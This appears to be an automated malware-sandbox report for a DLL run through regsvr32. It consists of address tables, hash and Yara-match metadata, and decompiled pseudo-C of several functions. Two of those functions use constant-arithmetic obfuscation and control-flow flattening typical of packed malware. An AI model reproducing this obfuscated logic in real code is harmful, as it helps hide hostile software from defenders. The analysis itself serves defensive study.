                                                                                                                0x10025848
                                                                                                                0x1002584f
                                                                                                                0x10025852
                                                                                                                0x1002585a
                                                                                                                0x10025862
                                                                                                                0x100258d6
                                                                                                                0x100258d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100258da
                                                                                                                0x10025864
                                                                                                                0x10025872
                                                                                                                0x10025877
                                                                                                                0x1002587a
                                                                                                                0x1002587a
                                                                                                                0x1002587b
                                                                                                                0x10025881
                                                                                                                0x10025888
                                                                                                                0x10025898
                                                                                                                0x100258ad
                                                                                                                0x100258af
                                                                                                                0x100258b4
                                                                                                                0x100258b7
                                                                                                                0x100258e1
                                                                                                                0x100258b9
                                                                                                                0x100258c0
                                                                                                                0x100258c5
                                                                                                                0x100258e6
                                                                                                                0x100258fb
                                                                                                                0x100258fb
                                                                                                                0x100258ec
                                                                                                                0x100258f3
                                                                                                                0x100258f3
                                                                                                                0x100258fd
                                                                                                                0x100258fe
                                                                                                                0x100258fe
                                                                                                                0x1002590b

                                                                                                                APIs
                                                                                                                • _strcpy_s.LIBCMT ref: 1002586C
                                                                                                                  • Part of subcall function 1003D47E: __getptd_noexit.LIBCMT ref: 1003D47E
                                                                                                                • __snprintf_s.LIBCMT ref: 100258A5
                                                                                                                  • Part of subcall function 1003D617: __vsnprintf_s_l.LIBCMT ref: 1003D62C
                                                                                                                • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100258D0
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 100258F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                • String ID: LOC
                                                                                                                • API String ID: 3864805678-519433814
                                                                                                                • Opcode ID: 5fa94b3df83eb69165c65857bbcdb0d87966c3e8da41a0faf5d7eb10fa7c61f5
                                                                                                                • Instruction ID: b361b73e61f3dc58a9df8e74141111329b382a9db3b2c6a5dbe71c1c9d46e873
                                                                                                                • Opcode Fuzzy Hash: 5fa94b3df83eb69165c65857bbcdb0d87966c3e8da41a0faf5d7eb10fa7c61f5
                                                                                                                • Instruction Fuzzy Hash: B211DA74900218AFD715EB74EC47BDD37A8DF04352F900176F615BB092DFB1AD458A64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C0A01 Relevance: 7.7, Strings: 6, Instructions: 218COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001C0A01(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				char _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				unsigned int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				void* _t130;
				signed int _t143;
				signed int _t157;
				void* _t162;
				void* _t164;
				intOrPtr _t172;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				void* _t193;
				void* _t194;
				void* _t196;

				_push(_a8);
				_t162 = __edx;
				_push(_a4);
				_push(__edx);
				E001AC98A(_t130);
				_v192 = 0xdf37dc;
				_t194 = _t193 + 0x10;
				_v192 = _v192 + 0xffffeae1;
				_t189 = 0;
				_t164 = 0x6cd3939;
				_t190 = 0x2a;
				_v192 = _v192 * 0x4c;
				_v192 = _v192 * 0x15;
				_v192 = _v192 ^ 0x6f13c0de;
				_v160 = 0x784f70;
				_t13 =  &_v160; // 0x784f70
				_v160 =  *_t13 * 0x34;
				_v160 = _v160 ^ 0x18721786;
				_v172 = 0x9325c;
				_t18 =  &_v172; // 0x9325c
				_v172 =  *_t18 * 0x56;
				_v172 = _v172 + 0xffff71a2;
				_v172 = _v172 ^ 0x0316211e;
				_v164 = 0x9c3fd5;
				_v164 = _v164 * 0x47;
				_v164 = _v164 ^ 0x2b51e95d;
				_v168 = 0x9bd35b;
				_v168 = _v168 + 0xffffef79;
				_v168 = _v168 + 0xbf8a;
				_v168 = _v168 ^ 0x009957ae;
				_v148 = 0x8ba637;
				_v148 = _v148 | 0x1e9c2665;
				_v148 = _v148 ^ 0x1e93d5b7;
				_v188 = 0xe809ca;
				_t191 = _v164;
				_v188 = _v188 / _t190;
				_v188 = _v188 >> 8;
				_v188 = _v188 ^ 0x138592b5;
				_v188 = _v188 ^ 0x138d9402;
				_v180 = 0xfc90aa;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 | 0x91baf864;
				_v180 = _v180 ^ 0x91b438e4;
				_v144 = 0xc37b39;
				_v144 = _v144 + 0xffff8c17;
				_v144 = _v144 ^ 0x00c0553c;
				_v176 = 0xac44bf;
				_v176 = _v176 | 0x9fc88e1b;
				_v176 = _v176 ^ 0x474a88ea;
				_v176 = _v176 ^ 0xd8af2460;
				_v184 = 0x82d85c;
				_v184 = _v184 + 0x3dbf;
				_v184 = _v184 >> 4;
				_v184 = _v184 ^ 0x000675f8;
				_v152 = 0x276e91;
				_v152 = _v152 | 0x1063ef2a;
				_v152 = _v152 ^ 0x106f66fa;
				_v156 = 0x72565b;
				_v156 = _v156 | 0x7da4a5d5;
				_v156 = _v156 ^ 0x7dfea5eb;
				while(1) {
					_t196 = _t164 - 0x7dcd9e3;
					if(_t196 > 0) {
						goto L25;
					}
					L2:
					if(_t196 == 0) {
						_t172 =  *0x1c420c; // 0x67d5d8
						_t189 = _t189 + 1;
						__eflags = _t189;
						_t117 = _t172 + 0x18; // 0x0
						 *((intOrPtr*)(_t191 + 0x3c)) =  *_t117;
						 *((intOrPtr*)(_t172 + 0x18)) = _t191;
						L24:
						_t164 = 0xa636d6d;
						continue;
						do {
							while(1) {
								_t196 = _t164 - 0x7dcd9e3;
								if(_t196 > 0) {
									goto L25;
								}
								goto L2;
							}
							L41:
							__eflags = _t164 - 0x4e30ef0;
						} while (_t164 != 0x4e30ef0);
						L42:
						return _t189;
					}
					if(_t164 == 0x49dcb06) {
						_t143 = E001B2783(_v148, _v188, _v180,  &_v140, _v144,  &_v132);
						_t194 = _t194 + 0x10;
						asm("sbb ecx, ecx");
						_t164 = ( ~_t143 & 0xfb301470) + 0xa636d6d;
						while(1) {
							_t196 = _t164 - 0x7dcd9e3;
							if(_t196 > 0) {
								goto L25;
							}
							goto L2;
						}
						goto L25;
					}
					if(_t164 == 0x51ea6f4) {
						__eflags = _v128 - 1;
						if(_v128 == 1) {
							E001AD4BC( &_v96);
							L12:
							_t164 = 0x7dcd9e3;
							continue;
						}
						_t164 = 0x8635b5c;
						continue;
					}
					if(_t164 == 0x59381dd) {
						_push(_t164);
						_t191 = E001A303A(_t164, 0x4c);
						_t194 = _t194 + 0xc;
						__eflags = _t191;
						if(_t191 == 0) {
							L32:
							_t164 = 0x49dcb06;
							continue;
						}
						_t164 = 0x51ea6f4;
						 *((intOrPtr*)(_t191 + 0x38)) = _v104;
						 *((intOrPtr*)(_t191 + 0x18)) = _v124;
						 *((intOrPtr*)(_t191 + 0x2c)) = _v112;
						continue;
					}
					if(_t164 == 0x6c5751f) {
						__eflags = _v128 - 4;
						if(_v128 == 4) {
							E001AAEBB( &_v96);
							goto L12;
						}
						_t164 = 0x7be19b3;
						continue;
					}
					if(_t164 == 0x6cd3939) {
						E001A6DD9( &_v60, _v192, _v160, _t162, _v172);
						_t194 = _t194 + 0xc;
						_t164 = 0xd7453b1;
						continue;
					}
					if(_t164 != 0x7be19b3) {
						goto L41;
					}
					if(_v128 == 5) {
						E001A1A5F( &_v96, _t191);
						goto L12;
					}
					_t164 = 0x904c6cc;
					continue;
					L25:
					__eflags = _t164 - 0x842322b;
					if(_t164 == 0x842322b) {
						__eflags = _v128 - 3;
						if(_v128 == 3) {
							E001A958A( &_v96);
							_t164 = 0x7dcd9e3;
							goto L41;
						}
						_t164 = 0x6c5751f;
						continue;
					}
					__eflags = _t164 - 0x8635b5c;
					if(_t164 == 0x8635b5c) {
						__eflags = _v128 - 2;
						if(_v128 == 2) {
							E001AC151( &_v96, _t191);
							goto L12;
						}
						_t164 = 0x842322b;
						continue;
					}
					__eflags = _t164 - 0x904c6cc;
					if(_t164 == 0x904c6cc) {
						__eflags = _v128 - 6;
						if(_v128 == 6) {
							E001B9A0C( &_v96);
						}
						goto L12;
					}
					__eflags = _t164 - 0xa636d6d;
					if(__eflags == 0) {
						_t157 = E001AA903(_v164,  &_v140, __eflags, _v168,  &_v60);
						__eflags = _t157;
						if(_t157 == 0) {
							goto L42;
						}
						goto L32;
					}
					__eflags = _t164 - 0xd7453b1;
					if(_t164 != 0xd7453b1) {
						goto L41;
					}
					E001B6E97(0);
					goto L24;
				}
			}





































                                                                                                                0x001c0a0b
                                                                                                                0x001c0a12
                                                                                                                0x001c0a14
                                                                                                                0x001c0a1b
                                                                                                                0x001c0a1d
                                                                                                                0x001c0a22
                                                                                                                0x001c0a2a
                                                                                                                0x001c0a2d
                                                                                                                0x001c0a3c
                                                                                                                0x001c0a3e
                                                                                                                0x001c0a4a
                                                                                                                0x001c0a4b
                                                                                                                0x001c0a54
                                                                                                                0x001c0a58
                                                                                                                0x001c0a60
                                                                                                                0x001c0a68
                                                                                                                0x001c0a6d
                                                                                                                0x001c0a71
                                                                                                                0x001c0a79
                                                                                                                0x001c0a81
                                                                                                                0x001c0a86
                                                                                                                0x001c0a8a
                                                                                                                0x001c0a92
                                                                                                                0x001c0a9a
                                                                                                                0x001c0aa7
                                                                                                                0x001c0aab
                                                                                                                0x001c0ab3
                                                                                                                0x001c0abb
                                                                                                                0x001c0ac3
                                                                                                                0x001c0acb
                                                                                                                0x001c0ad3
                                                                                                                0x001c0adb
                                                                                                                0x001c0ae3
                                                                                                                0x001c0aeb
                                                                                                                0x001c0af9
                                                                                                                0x001c0afd
                                                                                                                0x001c0b01
                                                                                                                0x001c0b06
                                                                                                                0x001c0b0e
                                                                                                                0x001c0b16
                                                                                                                0x001c0b1e
                                                                                                                0x001c0b23
                                                                                                                0x001c0b2b
                                                                                                                0x001c0b33
                                                                                                                0x001c0b3b
                                                                                                                0x001c0b43
                                                                                                                0x001c0b4b
                                                                                                                0x001c0b53
                                                                                                                0x001c0b5b
                                                                                                                0x001c0b63
                                                                                                                0x001c0b6b
                                                                                                                0x001c0b73
                                                                                                                0x001c0b7b
                                                                                                                0x001c0b80
                                                                                                                0x001c0b88
                                                                                                                0x001c0b90
                                                                                                                0x001c0b98
                                                                                                                0x001c0ba0
                                                                                                                0x001c0ba8
                                                                                                                0x001c0bb0
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0bc0
                                                                                                                0x001c0bc0
                                                                                                                0x001c0cfe
                                                                                                                0x001c0d04
                                                                                                                0x001c0d04
                                                                                                                0x001c0d05
                                                                                                                0x001c0d08
                                                                                                                0x001c0d0b
                                                                                                                0x001c0d0e
                                                                                                                0x001c0d0e
                                                                                                                0x001c0d13
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0bba
                                                                                                                0x001c0dd0
                                                                                                                0x001c0dd0
                                                                                                                0x001c0dd0
                                                                                                                0x001c0ddc
                                                                                                                0x001c0de8
                                                                                                                0x001c0de8
                                                                                                                0x001c0bcc
                                                                                                                0x001c0cdf
                                                                                                                0x001c0ce4
                                                                                                                0x001c0ceb
                                                                                                                0x001c0cf3
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0bba
                                                                                                                0x00000000
                                                                                                                0x001c0bb8
                                                                                                                0x001c0bd8
                                                                                                                0x001c0ca6
                                                                                                                0x001c0cab
                                                                                                                0x001c0cbb
                                                                                                                0x001c0c1b
                                                                                                                0x001c0c1b
                                                                                                                0x00000000
                                                                                                                0x001c0c1b
                                                                                                                0x001c0cad
                                                                                                                0x00000000
                                                                                                                0x001c0cad
                                                                                                                0x001c0be4
                                                                                                                0x001c0c71
                                                                                                                0x001c0c7a
                                                                                                                0x001c0c7c
                                                                                                                0x001c0c7f
                                                                                                                0x001c0c81
                                                                                                                0x001c0d70
                                                                                                                0x001c0d70
                                                                                                                0x00000000
                                                                                                                0x001c0d70
                                                                                                                0x001c0c8b
                                                                                                                0x001c0c90
                                                                                                                0x001c0c97
                                                                                                                0x001c0c9e
                                                                                                                0x00000000
                                                                                                                0x001c0c9e
                                                                                                                0x001c0bec
                                                                                                                0x001c0c45
                                                                                                                0x001c0c4a
                                                                                                                0x001c0c5a
                                                                                                                0x00000000
                                                                                                                0x001c0c5a
                                                                                                                0x001c0c4c
                                                                                                                0x00000000
                                                                                                                0x001c0c4c
                                                                                                                0x001c0bf4
                                                                                                                0x001c0c33
                                                                                                                0x001c0c38
                                                                                                                0x001c0c3b
                                                                                                                0x00000000
                                                                                                                0x001c0c3b
                                                                                                                0x001c0bfc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0c07
                                                                                                                0x001c0c16
                                                                                                                0x00000000
                                                                                                                0x001c0c16
                                                                                                                0x001c0c09
                                                                                                                0x00000000
                                                                                                                0x001c0d18
                                                                                                                0x001c0d18
                                                                                                                0x001c0d1e
                                                                                                                0x001c0db4
                                                                                                                0x001c0db9
                                                                                                                0x001c0dc9
                                                                                                                0x001c0dce
                                                                                                                0x00000000
                                                                                                                0x001c0dce
                                                                                                                0x001c0dbb
                                                                                                                0x00000000
                                                                                                                0x001c0dbb
                                                                                                                0x001c0d24
                                                                                                                0x001c0d2a
                                                                                                                0x001c0d93
                                                                                                                0x001c0d98
                                                                                                                0x001c0daa
                                                                                                                0x00000000
                                                                                                                0x001c0daa
                                                                                                                0x001c0d9a
                                                                                                                0x00000000
                                                                                                                0x001c0d9a
                                                                                                                0x001c0d2c
                                                                                                                0x001c0d32
                                                                                                                0x001c0d7a
                                                                                                                0x001c0d7f
                                                                                                                0x001c0d89
                                                                                                                0x001c0d89
                                                                                                                0x00000000
                                                                                                                0x001c0d7f
                                                                                                                0x001c0d34
                                                                                                                0x001c0d3a
                                                                                                                0x001c0d65
                                                                                                                0x001c0d6c
                                                                                                                0x001c0d6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0d6e
                                                                                                                0x001c0d3c
                                                                                                                0x001c0d42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001c0d4a
                                                                                                                0x00000000
                                                                                                                0x001c0d4a

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: [Vr$\2$]Q+$mmc$mmc$pOx
                                                                                                                • API String ID: 0-1739744460
                                                                                                                • Opcode ID: 24f686123271707370cffbe9e40e6fde8167f209c3314add08f5cb8f9cc39fcd
                                                                                                                • Instruction ID: 9e113bb1fc1c38a01323991614556109f699891c08a0dd93148c7f7f67bd7f6e
                                                                                                                • Opcode Fuzzy Hash: 24f686123271707370cffbe9e40e6fde8167f209c3314add08f5cb8f9cc39fcd
                                                                                                                • Instruction Fuzzy Hash: 7C9197B4008341CBC36ACF65C596A2BBBE1EBE8308F504A1EF58696660C770DE49CF47
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A3F5A Relevance: 7.7, Strings: 6, Instructions: 171COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001A3F5A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				void* _t141;
				signed int _t150;
				void* _t153;
				signed int _t160;
				signed int _t161;
				char* _t162;
				void* _t178;
				void* _t179;
				signed int* _t183;

				_push(_a8);
				_t178 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t141);
				_v156 = 0xe6b872;
				_t183 =  &(( &_v196)[4]);
				_v156 = _v156 + 0xffff1908;
				_v156 = _v156 ^ 0x00ef584d;
				_t179 = 0x997ece5;
				_v168 = 0x760666;
				_t160 = 0x3e;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 ^ 0x7df5bd18;
				_v168 = _v168 ^ 0x477441ed;
				_v188 = 0xea423a;
				_v188 = _v188 >> 0xe;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x0004e55a;
				_v148 = 0x5102b;
				_v148 = _v148 | 0x64f23aa1;
				_v148 = _v148 ^ 0x64f27935;
				_v172 = 0x2b9539;
				_v172 = _v172 | 0x56d945b3;
				_v172 = _v172 ^ 0x081559fa;
				_v172 = _v172 ^ 0x5ee277f8;
				_v136 = 0x799aa8;
				_v136 = _v136 | 0xd35f2ef9;
				_v136 = _v136 ^ 0xd3786496;
				_v164 = 0x266e74;
				_v164 = _v164 / _t160;
				_t161 = 0x4a;
				_v164 = _v164 * 0x43;
				_v164 = _v164 ^ 0x002d52c5;
				_v192 = 0x2eed33;
				_v192 = _v192 + 0xffff2284;
				_v192 = _v192 | 0x099d84b3;
				_v192 = _v192 << 0xd;
				_v192 = _v192 ^ 0xf1f5a48a;
				_v140 = 0x8fb330;
				_v140 = _v140 + 0xffffd26f;
				_v140 = _v140 ^ 0x0084292b;
				_v196 = 0x4ecb20;
				_v196 = _v196 + 0xffffc02f;
				_v196 = _v196 | 0x332f1428;
				_v196 = _v196 + 0xffffe6b3;
				_v196 = _v196 ^ 0x336f8650;
				_v180 = 0x124f00;
				_v180 = _v180 * 0x48;
				_v180 = _v180 | 0x3fc9aff3;
				_v180 = _v180 ^ 0x3feb33fa;
				_v176 = 0x12e52c;
				_v176 = _v176 / _t161;
				_v176 = _v176 >> 8;
				_v176 = _v176 ^ 0x00083e66;
				_v144 = 0xc0b5b7;
				_v144 = _v144 + 0x823c;
				_v144 = _v144 ^ 0x00cfdec5;
				_v152 = 0xd5e5c;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x06ad322c;
				_v184 = 0x161ac4;
				_v184 = _v184 + 0x557f;
				_v184 = _v184 + 0x8493;
				_v184 = _v184 | 0x1ca1de3a;
				_v184 = _v184 ^ 0x1cb6deb9;
				_v160 = 0xc049f6;
				_t150 = _v160 * 0x45;
				_v160 = _t150;
				_v160 = _v160 >> 3;
				_v160 = _v160 ^ 0x067dbbb6;
				do {
					while(_t179 != 0x2e01a8) {
						if(_t179 == 0xbfec75) {
							_v132 = 0x80;
							_t150 = E001A3DFB(_v156, _v168, _v188, _v148,  &_v132,  &_v128);
							_t183 =  &(_t183[4]);
							_t179 = 0x2e01a8;
							continue;
						}
						if(_t179 == 0x997ece5) {
							_t179 = 0xbfec75;
							continue;
						}
						_t189 = _t179 - 0xd1f2ddd;
						if(_t179 != 0xd1f2ddd) {
							goto L19;
						}
						_push(_v136);
						_t153 = E001AE4F5(_v172, 0x1a1680, _t189);
						E001A7F31(_v192, _v140, _v196, _v180,  &_v128, _v164, E001B3094(_t189), _v176, _t178);
						return E001BF94B(_t153, _v144, _v152, _v184, _v160);
					}
					__eflags = _v128;
					_t162 =  &_v128;
					if(_v128 == 0) {
						L18:
						_t179 = 0xd1f2ddd;
						goto L19;
					} else {
						goto L10;
					}
					do {
						L10:
						_t150 =  *_t162;
						__eflags = _t150 - 0x30;
						if(_t150 < 0x30) {
							L12:
							__eflags = _t150 - 0x61;
							if(_t150 < 0x61) {
								L14:
								__eflags = _t150 - 0x41;
								if(_t150 < 0x41) {
									L16:
									 *_t162 = 0x58;
									goto L17;
								}
								__eflags = _t150 - 0x5a;
								if(_t150 <= 0x5a) {
									goto L17;
								}
								goto L16;
							}
							__eflags = _t150 - 0x7a;
							if(_t150 <= 0x7a) {
								goto L17;
							}
							goto L14;
						}
						__eflags = _t150 - 0x39;
						if(_t150 <= 0x39) {
							goto L17;
						}
						goto L12;
						L17:
						_t162 = _t162 + 1;
						__eflags =  *_t162;
					} while ( *_t162 != 0);
					goto L18;
					L19:
					__eflags = _t179 - 0x1c39118;
				} while (__eflags != 0);
				return _t150;
			}






























                                                                                                                0x001a3f64
                                                                                                                0x001a3f6b
                                                                                                                0x001a3f6d
                                                                                                                0x001a3f74
                                                                                                                0x001a3f75
                                                                                                                0x001a3f76
                                                                                                                0x001a3f7b
                                                                                                                0x001a3f83
                                                                                                                0x001a3f86
                                                                                                                0x001a3f90
                                                                                                                0x001a3f98
                                                                                                                0x001a3f9d
                                                                                                                0x001a3fac
                                                                                                                0x001a3faf
                                                                                                                0x001a3fb3
                                                                                                                0x001a3fbb
                                                                                                                0x001a3fc3
                                                                                                                0x001a3fcb
                                                                                                                0x001a3fd0
                                                                                                                0x001a3fd5
                                                                                                                0x001a3fda
                                                                                                                0x001a3fe2
                                                                                                                0x001a3fea
                                                                                                                0x001a3ff2
                                                                                                                0x001a3ffa
                                                                                                                0x001a4002
                                                                                                                0x001a400a
                                                                                                                0x001a4012
                                                                                                                0x001a401a
                                                                                                                0x001a4022
                                                                                                                0x001a402a
                                                                                                                0x001a4032
                                                                                                                0x001a4042
                                                                                                                0x001a404b
                                                                                                                0x001a404c
                                                                                                                0x001a4050
                                                                                                                0x001a4058
                                                                                                                0x001a4060
                                                                                                                0x001a4068
                                                                                                                0x001a4070
                                                                                                                0x001a4075
                                                                                                                0x001a407d
                                                                                                                0x001a4085
                                                                                                                0x001a408d
                                                                                                                0x001a4095
                                                                                                                0x001a409d
                                                                                                                0x001a40a5
                                                                                                                0x001a40ad
                                                                                                                0x001a40b5
                                                                                                                0x001a40bd
                                                                                                                0x001a40ca
                                                                                                                0x001a40ce
                                                                                                                0x001a40d6
                                                                                                                0x001a40de
                                                                                                                0x001a40ec
                                                                                                                0x001a40f0
                                                                                                                0x001a40f5
                                                                                                                0x001a40fd
                                                                                                                0x001a4105
                                                                                                                0x001a410d
                                                                                                                0x001a4115
                                                                                                                0x001a411d
                                                                                                                0x001a4122
                                                                                                                0x001a412a
                                                                                                                0x001a4132
                                                                                                                0x001a413a
                                                                                                                0x001a4142
                                                                                                                0x001a414f
                                                                                                                0x001a415c
                                                                                                                0x001a4164
                                                                                                                0x001a4169
                                                                                                                0x001a416d
                                                                                                                0x001a4172
                                                                                                                0x001a417a
                                                                                                                0x001a417a
                                                                                                                0x001a4188
                                                                                                                0x001a420b
                                                                                                                0x001a4229
                                                                                                                0x001a422e
                                                                                                                0x001a4231
                                                                                                                0x00000000
                                                                                                                0x001a4231
                                                                                                                0x001a4190
                                                                                                                0x001a4200
                                                                                                                0x00000000
                                                                                                                0x001a4200
                                                                                                                0x001a4192
                                                                                                                0x001a4194
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a419a
                                                                                                                0x001a41a7
                                                                                                                0x001a41d6
                                                                                                                0x00000000
                                                                                                                0x001a41f2
                                                                                                                0x001a423b
                                                                                                                0x001a4240
                                                                                                                0x001a4244
                                                                                                                0x001a4269
                                                                                                                0x001a4269
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a4246
                                                                                                                0x001a4246
                                                                                                                0x001a4246
                                                                                                                0x001a4248
                                                                                                                0x001a424a
                                                                                                                0x001a4250
                                                                                                                0x001a4250
                                                                                                                0x001a4252
                                                                                                                0x001a4258
                                                                                                                0x001a4258
                                                                                                                0x001a425a
                                                                                                                0x001a4260
                                                                                                                0x001a4260
                                                                                                                0x00000000
                                                                                                                0x001a4260
                                                                                                                0x001a425c
                                                                                                                0x001a425e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a425e
                                                                                                                0x001a4254
                                                                                                                0x001a4256
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a4256
                                                                                                                0x001a424c
                                                                                                                0x001a424e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a4263
                                                                                                                0x001a4263
                                                                                                                0x001a4264
                                                                                                                0x001a4264
                                                                                                                0x00000000
                                                                                                                0x001a426b
                                                                                                                0x001a426b
                                                                                                                0x001a426b
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 3.$:B$MX$\^$tn&$AtG
                                                                                                                • API String ID: 0-4051168333
                                                                                                                • Opcode ID: 011212951ef11eaeda251e0241905eae9a10fdc0ac814704e37244f25ded758a
                                                                                                                • Instruction ID: 7091706f449bdad6f96f76cf592d5387d50dd1070154cd50bfcd9887d5d7aab1
                                                                                                                • Opcode Fuzzy Hash: 011212951ef11eaeda251e0241905eae9a10fdc0ac814704e37244f25ded758a
                                                                                                                • Instruction Fuzzy Hash: 54815275409380AFC358CE25DA8A65BBBE0FBD6708F405A1DF59596260C3B18A0A8F83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003B437 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1003B437(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x1006dbdc; // 0xdf7c0cda
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x100710e8 = _t6;
				 *0x100710e4 = _t22;
				 *0x100710e0 = _t25;
				 *0x100710dc = _t21;
				 *0x100710d8 = _t27;
				 *0x100710d4 = _t26;
				 *0x10071100 = ss;
				 *0x100710f4 = cs;
				 *0x100710d0 = ds;
				 *0x100710cc = es;
				 *0x100710c8 = fs;
				 *0x100710c4 = gs;
				asm("pushfd");
				_pop( *0x100710f8);
				 *0x100710ec =  *_t31;
				 *0x100710f0 = _v0;
				 *0x100710fc =  &_a4;
				 *0x10071038 = 0x10001;
				_t11 =  *0x100710f0; // 0x0
				 *0x10070fec = _t11;
				 *0x10070fe0 = 0xc0000409;
				 *0x10070fe4 = 1;
				_t12 =  *0x1006dbdc; // 0xdf7c0cda
				_v812 = _t12;
				_t13 =  *0x1006dbe0; // 0x2083f325
				_v808 = _t13;
				 *0x10071030 = IsDebuggerPresent();
				_push(1);
				E1004BA27(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1005e0b0);
				if( *0x10071030 == 0) {
					_push(1);
					E1004BA27(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                0x1003b437
                                                                                                                0x1003b437
                                                                                                                0x1003b437
                                                                                                                0x1003b437
                                                                                                                0x1003b437
                                                                                                                0x1003b437
                                                                                                                0x1003b437
                                                                                                                0x1003b43d
                                                                                                                0x1003b43f
                                                                                                                0x1003b43f
                                                                                                                0x10042f35
